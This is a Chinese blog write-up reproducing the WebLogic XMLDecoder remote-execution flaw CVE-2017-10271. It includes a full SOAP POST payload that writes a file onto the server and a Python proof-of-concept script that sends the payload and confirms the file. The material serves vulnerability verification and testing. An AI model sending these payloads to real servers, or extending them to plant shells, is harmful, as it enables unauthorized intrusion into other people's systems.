WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)

漏洞编号:CVE​​-2017-10271

漏洞描述:WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构建请求对运行WebLogic中间件的主机进行攻击,近期发现在这个漏洞的使用方式为传播挖矿程序。

受影响WebLogic版本:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0。

A、环境搭建

  不解释

B、漏洞利用:

1、初步判定:访问http://192.168.8.148:7001/wls-wsat/CoordinatorPortType11,存在下图则说明可能存在漏洞

2、构建POST包进行测试,写入test.txt

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.8.148:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 756<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.6.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println"><string>xmldecoder_vul_test</string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/>
</soapenv:Envelope>

PS:wls-wsat路径 /root/Oracle/Middleware//user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat/

3、访问test.txt,漏洞验证成功

Python验证脚本:

#!/usr/bin/env python
# coding:utf-8import requests
from sys import argvheaders = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Upgrade-Insecure-Requests': '1','Content-Type': 'text/xml'}
def Webogic_XMLDecoder_poc(url):#url="http://192.168.8.148:7001"posturl=url+'/wls-wsat/CoordinatorPortType'data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.6.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println"><string>xmldecoder_vul_test</string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'''print urltry:r=requests.post(posturl,data=data,headers=headers,timeout=5)geturl=url+"/wls-wsat/test.txt"#print geturlcheck_result = requests.get(geturl,headers=headers,timeout=5)if 'xmldecoder_vul_test' in check_result.text:print u"存在WebLogic WLS远程执行漏洞(CVE-2017-10271)"except:passif __name__ == '__main__':if len(argv) == 1:print "Please input python Webogic_XMLDecoder_poc.py http://xxxx:7001"exit(0)else:url = argv[1]Webogic_XMLDecoder_poc(url)

验证截图:

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

参考文章:

https://github.com/ysrc/xunfeng/blob/master/vulscan/vuldb/weblogic_CVE_2017_10271.py

http://www.cnblogs.com/sevck/p/8092760.html

http://blog.csdn.net/qq_27446553/article/details/78952010

Weblogic(CVE-2017-10271)漏洞复现相关推荐

  1. 关于WebLogic环境搭建和漏洞复现

    一.环境搭建 使用kali系统安装docker,再在docker上安装环境,这里以CVE-2020-14882为例 在kali进入root用户,输入 git clone https://github. ...

  2. Weblogic历史漏洞复现

    Weblogic WebLogic是美国Oracle公司出品的一个applicationserver,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发.集成.部署和管理大型分布式 ...

  3. java rmi漏洞工具_学生会私房菜【20200924】Weblogic WLS核心组件反序列化命令执行突破(CVE20182628)漏洞复现...

    学生会私房菜 学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题. 本期文档内容为:Weblogic WLS核心组件反序列化命令执行突破(CVE-2018-26 ...

  4. weblogic中ssrf漏洞修复_Weblogic-SSRF漏洞复现

    0x00简介 WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发.集成.部署和管理大型分 ...

  5. weblogic漏洞复现(CVE-2020-2555)

    漏洞环境:fofa自己找,server=weblogic port=7001 一.漏洞简介 该反序列化的gadget存在与coherence包中.具体可以见分析 构造chain类似于common-co ...

  6. weblogic 漏洞复现

    cd vulhub/weblogic/CVE-2018-2894/ //进入对应得目录sudo service docker start //启动docker服务docker-compose up - ...

  7. Weblogic WLS Core Components 反序列化命令执行漏洞复现(CVE-2018-2628)

    Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未 ...

  8. [web攻防] weblogic 漏洞复现 CVE-2017-10271CVE-2018-2628CVE-2018-2894

    用docker复现weblogic的部分高危漏洞,主要是记录下一些操作,积累自己的知识储备.由于时间与个人水平原因,不对原理做过多叙述. 目录 环境打开方式 CVE-2017-10271 weblog ...

  9. weblogic修改banner_Weblogic多个漏洞复现

    WebLogic两处任意文件上传漏洞(CVE-2018-2894) 涉及版本: version:10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3 漏洞地址 WebLogic管理端 ...

  10. 【漏洞复现】Weblogic CVE-2023-21839

    一.漏洞简介 1. 产品简介 WebLogic是Oracle公司研发的用于开发.集成.部署和管理大型分布式Web应用.网络应用和数据库应用的Java应用服务器,在全球范围内被广泛使用. 2. 漏洞简介 ...

最新文章

  1. 说人话教AI打游戏,Facebook开源迷你版星际争霸,成果登上NeurIPS 2019
  2. spring手动控制事务开启_“上帝视角”图解Spring事务的传播机制原理
  3. Mysql 8主从复制配置图解
  4. python基础查漏补缺1--算数、字符串与变量
  5. SpringMVC4 实例
  6. 5G 背面:物联网的变局!
  7. 作业MathExam
  8. 关于C#解决无法解析skinEngine和使用皮肤的问题
  9. 浅谈软件开发的四大要素
  10. mysql中update语句怎么设置变量_MySQL数据库update语句使用详解
  11. 有个人在偷偷的爱着你
  12. Nginx负载均衡探活max_fails和fail_timeout的设置、根据参数转发upstream
  13. 计算机教室架构,物联网智慧教室架构
  14. Reflex WMS入门系列三十二:导出到Excel
  15. 博客添加人体时钟效果
  16. python求平衡点的几种方法
  17. 在线压力并发工具AB版 简单易用
  18. 华为云桌面,开启云上高效办公之旅!
  19. inf文件详解(转)
  20. 三菱FX5U PLSV指令-可变速度输出

热门文章

  1. 考导游证需要什么条件?报考导游领队需要什么条件?
  2. 导游证怎么自考?考试流程有哪些?
  3. 2022熔化焊接与热切割复习题及模拟考试
  4. IC的Strap Pin
  5. 大数据主要概念股一览
  6. 【量化交易】 成长指路 【0010】
  7. 玩fifa服务器显示异常,fifa服务器链接异常
  8. H---Hobject
  9. 凸包 (Convex Hull)
  10. 零基础搭建网站(保姆级教程)